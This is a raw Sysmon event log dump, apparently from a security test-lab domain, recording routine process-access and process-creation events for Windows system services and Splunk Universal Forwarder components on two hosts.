22:15:21.254{8e433fbf-36ff-6013-ac03-000000001100}89045328C:\Windows\servicing\TrustedInstaller.exe{8e433fbf-36ff-6013-ad03-000000001100}3428C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.411_none_5f53d2d858cf8961\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\combase.dll+d8cfb|C:\Windows\servicing\TrustedInstaller.exe+4a18|C:\Windows\servicing\TrustedInstaller.exe+212c|C:\Windows\servicing\TrustedInstaller.exe+2c88|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362626Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:24.707{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x800000000000000033135Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:26.865{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-377E-6013-8E03-00000000A401}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033134Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:26.865{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033133Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:26.865{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033132Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:26.865{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033131Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:26.865{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033130Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:26.865{FF16AF91-26B4-6013-0500-00000000A401}644660C:\Windows\system32\csrss.exe{FF16AF91-377E-6013-8E03-00000000A401}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000033129Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:26.865{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-377E-6013-8E03-00000000A401}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000033128Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:26.865{FF16AF91-377E-6013-8E03-00000000A401}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000033127Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:26.349{FF16AF91-377E-6013-8D03-00000000A401}62923020C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033126Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:26.193{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-377E-6013-8D03-00000000A401}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033125Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:26.193{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033124Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:26.193{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033123Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:26.193{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033122Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:26.193{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033121Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:26.193{FF16AF91-26B4-6013-0500-00000000A401}6441200C:\Windows\system32\csrss.exe{FF16AF91-377E-6013-8D03-00000000A401}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000033120Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:26.193{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-377E-6013-8D03-00000000A401}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000033119Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:26.194{FF16AF91-377E-6013-8D03-00000000A401}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000033143Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:29.380{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-3781-6013-8F03-00000000A401}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033142Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:29.380{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033141Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:29.380{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033140Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:29.380{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033139Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:29.380{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033138Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:29.380{FF16AF91-26B4-6013-0500-00000000A401}644660C:\Windows\system32\csrss.exe{FF16AF91-3781-6013-8F03-00000000A401}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000033137Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:29.380{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-3781-6013-8F03-00000000A401}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000033136Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:29.381{FF16AF91-3781-6013-8F03-00000000A401}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362673Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.990{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-3782-6013-cb03-000000001100}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362672Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.990{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 